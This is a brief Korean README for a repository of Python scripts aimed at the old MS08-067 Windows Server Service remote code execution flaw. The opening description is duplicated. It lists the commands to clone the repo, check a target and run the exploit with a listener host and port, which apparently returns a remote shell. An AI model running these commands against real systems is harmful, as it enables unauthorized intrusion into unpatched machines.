
이 저장소는 MS08-067 Windows Server Service 취약점(CVE-2008-4250)에 대한 파이썬 스크립트 구현을 포함하고 있습니다. 이는 구형 Windows 시스템에 영향을 미치는 고전적인 원격 코드 실행 취약점입니다.
이 저장소는 MS08-067 Windows Server Service 취약점(CVE-2008-4250)에 대한 몇 가지 python 스크립트 구현을 포함합니다. 이는 오래된 Windows 시스템에 영향을 미치는 고전적인 원격 코드 실행 취약점입니다.
먼저, Shell 또는 Cmd를 엽니다. 그리고 👉 다음 명령을 실행하세요:
git clone https://github.com/BinRacer/ms08-067.py.git
cd ms08-067.py
pip install -r requirements.txt
python src/ms08_067_check.py <target_ip>
# before use ms08_067_exploit.py, must replace shellcode in python file
python src/ms08_067_exploit.py <target_ip> <lhost> <lport>
전체 법적 정보 및 면책 조항은 면책 조항 문서를 참조하세요.